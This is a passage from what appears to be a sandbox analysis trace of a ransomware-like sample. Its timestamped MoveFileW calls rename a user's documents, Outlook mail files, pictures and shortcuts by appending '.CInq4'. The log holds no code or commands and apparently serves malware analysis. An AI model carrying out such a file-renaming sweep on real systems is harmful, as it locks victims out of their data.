(lpExistingFileName="c:\\users\\eebsym5\\documents\\3H1cW86PebjnUv1Yb-m.csv" (normalized: "c:\\users\\eebsym5\\documents\\3h1cw86pebjnuv1yb-m.csv"), lpNewFileName="c:\\users\\eebsym5\\documents\\3H1cW86PebjnUv1Yb-m.csv.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\3h1cw86pebjnuv1yb-m.csv.cinq4")) returned 1 [0045.350] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\3Iwyi.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\3iwyi.xlsx"), lpNewFileName="c:\\users\\eebsym5\\documents\\3Iwyi.xlsx.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\3iwyi.xlsx.cinq4")) returned 1 [0045.353] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\76uxv GdaUFGtb--clr.odp" (normalized: "c:\\users\\eebsym5\\documents\\76uxv gdaufgtb--clr.odp"), lpNewFileName="c:\\users\\eebsym5\\documents\\76uxv GdaUFGtb--clr.odp.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\76uxv gdaufgtb--clr.odp.cinq4")) returned 1 [0045.357] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\8NvSUmdCYkRyn LhLT.ots" (normalized: "c:\\users\\eebsym5\\documents\\8nvsumdcykryn lhlt.ots"), lpNewFileName="c:\\users\\eebsym5\\documents\\8NvSUmdCYkRyn LhLT.ots.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\8nvsumdcykryn lhlt.ots.cinq4")) returned 1 [0045.359] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\9yUXY8Y6QJh.ods" (normalized: "c:\\users\\eebsym5\\documents\\9yuxy8y6qjh.ods"), lpNewFileName="c:\\users\\eebsym5\\documents\\9yUXY8Y6QJh.ods.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\9yuxy8y6qjh.ods.cinq4")) returned 1 [0045.360] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\ABm6.ots" (normalized: "c:\\users\\eebsym5\\documents\\abm6.ots"), lpNewFileName="c:\\users\\eebsym5\\documents\\ABm6.ots.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\abm6.ots.cinq4")) returned 1 [0045.367] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\Ae6V-x68xHulBAqnmyv.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ae6v-x68xhulbaqnmyv.pptx"), lpNewFileName="c:\\users\\eebsym5\\documents\\Ae6V-x68xHulBAqnmyv.pptx.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\ae6v-x68xhulbaqnmyv.pptx.cinq4")) returned 1 [0045.372] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\AKoSG19.rtf" (normalized: "c:\\users\\eebsym5\\documents\\akosg19.rtf"), lpNewFileName="c:\\users\\eebsym5\\documents\\AKoSG19.rtf.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\akosg19.rtf.cinq4")) returned 1 [0045.378] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\b0MkGEDi.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\b0mkgedi.xlsx"), lpNewFileName="c:\\users\\eebsym5\\documents\\b0MkGEDi.xlsx.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\b0mkgedi.xlsx.cinq4")) returned 1 [0045.381] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\c0bPbn3eRI.pptx" (normalized: "c:\\users\\eebsym5\\documents\\c0bpbn3eri.pptx"), lpNewFileName="c:\\users\\eebsym5\\documents\\c0bPbn3eRI.pptx.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\c0bpbn3eri.pptx.cinq4")) returned 1 [0045.383] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\desktop.ini" (normalized: "c:\\users\\eebsym5\\documents\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\documents\\desktop.ini.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\desktop.ini.cinq4")) returned 1 [0045.391] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\BPx3bYqOm-C9WtkLE.rtf" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\bpx3byqom-c9wtkle.rtf"), lpNewFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\BPx3bYqOm-C9WtkLE.rtf.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\bpx3byqom-c9wtkle.rtf.cinq4")) returned 1 [0045.395] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\Cnlpr30MwlY8sM-K.docx" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\cnlpr30mwly8sm-k.docx"), lpNewFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\Cnlpr30MwlY8sM-K.docx.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\cnlpr30mwly8sm-k.docx.cinq4")) returned 1 [0045.398] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\DoGsxAS fzsv3usVcLF.rtf" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\dogsxas fzsv3usvclf.rtf"), lpNewFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\DoGsxAS fzsv3usVcLF.rtf.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\dogsxas fzsv3usvclf.rtf.cinq4")) returned 1 [0045.400] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\fw Lp8dvf.odt" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\fw lp8dvf.odt"), lpNewFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\fw Lp8dvf.odt.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\fw lp8dvf.odt.cinq4")) returned 1 [0045.402] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\gIp_.odt" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\gip_.odt"), lpNewFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\gIp_.odt.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\gip_.odt.cinq4")) returned 1 [0045.405] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\JDFcqscJecsJjXXzI0.csv" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\jdfcqscjecsjjxxzi0.csv"), lpNewFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\JDFcqscJecsJjXXzI0.csv.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\jdfcqscjecsjjxxzi0.csv.cinq4")) returned 1 [0045.408] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\K 4psb38WGnfz4j.ods" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\k 4psb38wgnfz4j.ods"), lpNewFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\K 4psb38WGnfz4j.ods.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\k 4psb38wgnfz4j.ods.cinq4")) returned 1 [0045.411] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\qd0VlesT.odp" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\qd0vlest.odp"), lpNewFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\qd0VlesT.odp.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\qd0vlest.odp.cinq4")) returned 1 [0045.415] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\U7s8rdlV5Oggz.ods" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\u7s8rdlv5oggz.ods"), lpNewFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\U7s8rdlV5Oggz.ods.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\u7s8rdlv5oggz.ods.cinq4")) returned 1 [0045.419] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\wGvLKkGVV0g.odp" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\wgvlkkgvv0g.odp"), lpNewFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\wGvLKkGVV0g.odp.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\wgvlkkgvv0g.odp.cinq4")) returned 1 [0045.421] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\XOrkn1xji3i.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\xorkn1xji3i.xlsx"), lpNewFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\XOrkn1xji3i.xlsx.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\xorkn1xji3i.xlsx.cinq4")) returned 1 [0045.424] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\yvQAWc3evc-ZEpz3Bd.ots" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\yvqawc3evc-zepz3bd.ots"), lpNewFileName="c:\\users\\eebsym5\\documents\\g-xmaqg\\yvQAWc3evc-ZEpz3Bd.ots.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\g-xmaqg\\yvqawc3evc-zepz3bd.ots.cinq4")) returned 1 [0045.432] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\gM1Vd.ppt" (normalized: "c:\\users\\eebsym5\\documents\\gm1vd.ppt"), lpNewFileName="c:\\users\\eebsym5\\documents\\gM1Vd.ppt.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\gm1vd.ppt.cinq4")) returned 1 [0045.436] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\HhYrj IfrM.xls" (normalized: "c:\\users\\eebsym5\\documents\\hhyrj ifrm.xls"), lpNewFileName="c:\\users\\eebsym5\\documents\\HhYrj IfrM.xls.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\hhyrj ifrm.xls.cinq4")) returned 1 [0045.438] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\IWX6C7HzotP.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\iwx6c7hzotp.xlsx"), lpNewFileName="c:\\users\\eebsym5\\documents\\IWX6C7HzotP.xlsx.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\iwx6c7hzotp.xlsx.cinq4")) returned 1 [0045.441] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\K7zQF8IGt3.docx" (normalized: "c:\\users\\eebsym5\\documents\\k7zqf8igt3.docx"), lpNewFileName="c:\\users\\eebsym5\\documents\\K7zQF8IGt3.docx.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\k7zqf8igt3.docx.cinq4")) returned 1 [0045.444] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\kPtXRE8YDE0HhLGDx 5b.ods" (normalized: "c:\\users\\eebsym5\\documents\\kptxre8yde0hhlgdx 5b.ods"), lpNewFileName="c:\\users\\eebsym5\\documents\\kPtXRE8YDE0HhLGDx 5b.ods.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\kptxre8yde0hhlgdx 5b.ods.cinq4")) returned 1 [0045.446] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\my shapes\\desktop.ini" (normalized: "c:\\users\\eebsym5\\documents\\my shapes\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\documents\\my shapes\\desktop.ini.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\my shapes\\desktop.ini.cinq4")) returned 1 [0045.496] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\NASF.pps" (normalized: "c:\\users\\eebsym5\\documents\\nasf.pps"), lpNewFileName="c:\\users\\eebsym5\\documents\\NASF.pps.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\nasf.pps.cinq4")) returned 1 [0045.500] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\nBj6MQZGi5.rtf" (normalized: "c:\\users\\eebsym5\\documents\\nbj6mqzgi5.rtf"), lpNewFileName="c:\\users\\eebsym5\\documents\\nBj6MQZGi5.rtf.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\nbj6mqzgi5.rtf.cinq4")) returned 1 [0045.512] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\njWi97PdpRld9j1s9I.docx" (normalized: "c:\\users\\eebsym5\\documents\\njwi97pdprld9j1s9i.docx"), lpNewFileName="c:\\users\\eebsym5\\documents\\njWi97PdpRld9j1s9I.docx.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\njwi97pdprld9j1s9i.docx.cinq4")) returned 1 [0045.514] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\Np_Z.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\np_z.xlsx"), lpNewFileName="c:\\users\\eebsym5\\documents\\Np_Z.xlsx.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\np_z.xlsx.cinq4")) returned 1 [0045.519] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\ocyb6cj90z 0oo5H.docx" (normalized: "c:\\users\\eebsym5\\documents\\ocyb6cj90z 0oo5h.docx"), lpNewFileName="c:\\users\\eebsym5\\documents\\ocyb6cj90z 0oo5H.docx.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\ocyb6cj90z 0oo5h.docx.cinq4")) returned 1 [0045.524] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\OJMD.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ojmd.pptx"), lpNewFileName="c:\\users\\eebsym5\\documents\\OJMD.pptx.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\ojmd.pptx.cinq4")) returned 1 [0045.556] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\outlook files\\feasf@efw.com.pst" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\feasf@efw.com.pst"), lpNewFileName="c:\\users\\eebsym5\\documents\\outlook files\\feasf@efw.com.pst.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\feasf@efw.com.pst.cinq4")) returned 1 [0045.584] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\outlook files\\Outlook Data File - mail.pst" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\outlook data file - mail.pst"), lpNewFileName="c:\\users\\eebsym5\\documents\\outlook files\\Outlook Data File - mail.pst.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\outlook data file - mail.pst.cinq4")) returned 1 [0045.592] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\qlAW n9SCgpzn.pptx" (normalized: "c:\\users\\eebsym5\\documents\\qlaw n9scgpzn.pptx"), lpNewFileName="c:\\users\\eebsym5\\documents\\qlAW n9SCgpzn.pptx.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\qlaw n9scgpzn.pptx.cinq4")) returned 1 [0045.594] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\RDyC2wf_34bEF.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\rdyc2wf_34bef.xlsx"), lpNewFileName="c:\\users\\eebsym5\\documents\\RDyC2wf_34bEF.xlsx.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\rdyc2wf_34bef.xlsx.cinq4")) returned 1 [0045.597] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\RGyKpkSEjm.docx" (normalized: "c:\\users\\eebsym5\\documents\\rgykpksejm.docx"), lpNewFileName="c:\\users\\eebsym5\\documents\\RGyKpkSEjm.docx.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\rgykpksejm.docx.cinq4")) returned 1 [0045.625] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\supbcHre0UqfNWkPh.pptx" (normalized: "c:\\users\\eebsym5\\documents\\supbchre0uqfnwkph.pptx"), lpNewFileName="c:\\users\\eebsym5\\documents\\supbcHre0UqfNWkPh.pptx.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\supbchre0uqfnwkph.pptx.cinq4")) returned 1 [0045.627] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\tIc5Z2V9Xl.pptx" (normalized: "c:\\users\\eebsym5\\documents\\tic5z2v9xl.pptx"), lpNewFileName="c:\\users\\eebsym5\\documents\\tIc5Z2V9Xl.pptx.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\tic5z2v9xl.pptx.cinq4")) returned 1 [0045.632] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\VQ1gd7oiEKIkQ.docx" (normalized: "c:\\users\\eebsym5\\documents\\vq1gd7oiekikq.docx"), lpNewFileName="c:\\users\\eebsym5\\documents\\VQ1gd7oiEKIkQ.docx.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\vq1gd7oiekikq.docx.cinq4")) returned 1 [0045.635] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\VyTyj-R9XKxPoJL.docx" (normalized: "c:\\users\\eebsym5\\documents\\vytyj-r9xkxpojl.docx"), lpNewFileName="c:\\users\\eebsym5\\documents\\VyTyj-R9XKxPoJL.docx.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\vytyj-r9xkxpojl.docx.cinq4")) returned 1 [0045.637] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\w93jUZej_fLnqMETz.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\w93juzej_flnqmetz.xlsx"), lpNewFileName="c:\\users\\eebsym5\\documents\\w93jUZej_fLnqMETz.xlsx.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\w93juzej_flnqmetz.xlsx.cinq4")) returned 1 [0045.641] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\yBSa8wX56GadPmdS.xls" (normalized: "c:\\users\\eebsym5\\documents\\ybsa8wx56gadpmds.xls"), lpNewFileName="c:\\users\\eebsym5\\documents\\yBSa8wX56GadPmdS.xls.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\ybsa8wx56gadpmds.xls.cinq4")) returned 1 [0045.647] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\ZQFPlLLJcG.ots" (normalized: "c:\\users\\eebsym5\\documents\\zqfpllljcg.ots"), lpNewFileName="c:\\users\\eebsym5\\documents\\ZQFPlLLJcG.ots.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\zqfpllljcg.ots.cinq4")) returned 1 [0045.649] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\_Pd5ksq8IUStSyz0u.xls" (normalized: "c:\\users\\eebsym5\\documents\\_pd5ksq8iustsyz0u.xls"), lpNewFileName="c:\\users\\eebsym5\\documents\\_Pd5ksq8IUStSyz0u.xls.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\_pd5ksq8iustsyz0u.xls.cinq4")) returned 1 [0045.651] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\_V3vWbuUxbGtebcXi5ye.pps" (normalized: "c:\\users\\eebsym5\\documents\\_v3vwbuuxbgtebcxi5ye.pps"), lpNewFileName="c:\\users\\eebsym5\\documents\\_V3vWbuUxbGtebcXi5ye.pps.CInq4" (normalized: "c:\\users\\eebsym5\\documents\\_v3vwbuuxbgtebcxi5ye.pps.cinq4")) returned 1 [0045.653] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\downloads\\desktop.ini" (normalized: "c:\\users\\eebsym5\\downloads\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\downloads\\desktop.ini.CInq4" (normalized: "c:\\users\\eebsym5\\downloads\\desktop.ini.cinq4")) returned 1 [0045.691] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\favorites\\desktop.ini" (normalized: "c:\\users\\eebsym5\\favorites\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\favorites\\desktop.ini.CInq4" (normalized: "c:\\users\\eebsym5\\favorites\\desktop.ini.cinq4")) returned 1 [0045.710] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\favorites\\links\\desktop.ini" (normalized: "c:\\users\\eebsym5\\favorites\\links\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\favorites\\links\\desktop.ini.CInq4" (normalized: "c:\\users\\eebsym5\\favorites\\links\\desktop.ini.cinq4")) returned 1 [0045.814] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\favorites\\links\\Suggested Sites.url" (normalized: "c:\\users\\eebsym5\\favorites\\links\\suggested sites.url"), lpNewFileName="c:\\users\\eebsym5\\favorites\\links\\Suggested Sites.url.CInq4" (normalized: "c:\\users\\eebsym5\\favorites\\links\\suggested sites.url.cinq4")) returned 1 [0045.816] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\favorites\\links\\Web Slice Gallery.url" (normalized: "c:\\users\\eebsym5\\favorites\\links\\web slice gallery.url"), lpNewFileName="c:\\users\\eebsym5\\favorites\\links\\Web Slice Gallery.url.CInq4" (normalized: "c:\\users\\eebsym5\\favorites\\links\\web slice gallery.url.cinq4")) returned 1 [0045.824] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN Autos.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn autos.url"), lpNewFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN Autos.url.CInq4" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn autos.url.cinq4")) returned 1 [0045.825] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN Entertainment.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN Entertainment.url.CInq4" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn entertainment.url.cinq4")) returned 1 [0045.827] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN Money.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn money.url"), lpNewFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN Money.url.CInq4" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn money.url.cinq4")) returned 1 [0045.828] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN Sports.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn sports.url"), lpNewFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN Sports.url.CInq4" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn sports.url.cinq4")) returned 1 [0045.831] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn.url"), lpNewFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSN.url.CInq4" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msn.url.cinq4")) returned 1 [0045.833] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSNBC News.url" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="c:\\users\\eebsym5\\favorites\\msn websites\\MSNBC News.url.CInq4" (normalized: "c:\\users\\eebsym5\\favorites\\msn websites\\msnbc news.url.cinq4")) returned 1 [0045.838] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\links\\desktop.ini" (normalized: "c:\\users\\eebsym5\\links\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\links\\desktop.ini.CInq4" (normalized: "c:\\users\\eebsym5\\links\\desktop.ini.cinq4")) returned 1 [0045.845] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\music\\desktop.ini" (normalized: "c:\\users\\eebsym5\\music\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\music\\desktop.ini.CInq4" (normalized: "c:\\users\\eebsym5\\music\\desktop.ini.cinq4")) returned 1 [0045.881] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\ntuser.ini" (normalized: "c:\\users\\eebsym5\\ntuser.ini"), lpNewFileName="c:\\users\\eebsym5\\ntuser.ini.CInq4" (normalized: "c:\\users\\eebsym5\\ntuser.ini.cinq4")) returned 1 [0045.889] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\-11mX.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\-11mx.bmp"), lpNewFileName="c:\\users\\eebsym5\\pictures\\-11mX.bmp.CInq4" (normalized: "c:\\users\\eebsym5\\pictures\\-11mx.bmp.cinq4")) returned 1 [0045.891] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\49th-XF.png" (normalized: "c:\\users\\eebsym5\\pictures\\49th-xf.png"), lpNewFileName="c:\\users\\eebsym5\\pictures\\49th-XF.png.CInq4" (normalized: "c:\\users\\eebsym5\\pictures\\49th-xf.png.cinq4")) returned 1 [0045.893] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\6ZJkVBSeo-K.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\6zjkvbseo-k.bmp"), lpNewFileName="c:\\users\\eebsym5\\pictures\\6ZJkVBSeo-K.bmp.CInq4" (normalized: "c:\\users\\eebsym5\\pictures\\6zjkvbseo-k.bmp.cinq4")) returned 1 [0045.901] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\A7YHcIpYi9.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\a7yhcipyi9.bmp"), lpNewFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\A7YHcIpYi9.bmp.CInq4" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\a7yhcipyi9.bmp.cinq4")) returned 1 [0045.903] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\Ap9JCsd.png" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\ap9jcsd.png"), lpNewFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\Ap9JCsd.png.CInq4" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\ap9jcsd.png.cinq4")) returned 1 [0045.905] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\MRaActwrCBxT.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\mraactwrcbxt.jpg"), lpNewFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\MRaActwrCBxT.jpg.CInq4" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\mraactwrcbxt.jpg.cinq4")) returned 1 [0045.907] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\PizAD39aBNCV.png" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\pizad39abncv.png"), lpNewFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\PizAD39aBNCV.png.CInq4" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\pizad39abncv.png.cinq4")) returned 1 [0045.911] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\POfl3a-l.png" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\pofl3a-l.png"), lpNewFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\POfl3a-l.png.CInq4" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\pofl3a-l.png.cinq4")) returned 1 [0045.912] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\rD7TFDs4mV8cDgM.png" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\rd7tfds4mv8cdgm.png"), lpNewFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\rD7TFDs4mV8cDgM.png.CInq4" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\rd7tfds4mv8cdgm.png.cinq4")) returned 1 [0045.915] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\X6Y7yPEXZvVxK8gGc.png" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\x6y7ypexzvvxk8ggc.png"), lpNewFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\X6Y7yPEXZvVxK8gGc.png.CInq4" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\x6y7ypexzvvxk8ggc.png.cinq4")) returned 1 [0045.919] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\xTjJo96DDpNhn.png" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\xtjjo96ddpnhn.png"), lpNewFileName="c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\xTjJo96DDpNhn.png.CInq4" (normalized: "c:\\users\\eebsym5\\pictures\\arupj0mp4n4fmofl\\xtjjo96ddpnhn.png.cinq4")) returned 1 [0045.922] MoveFileW 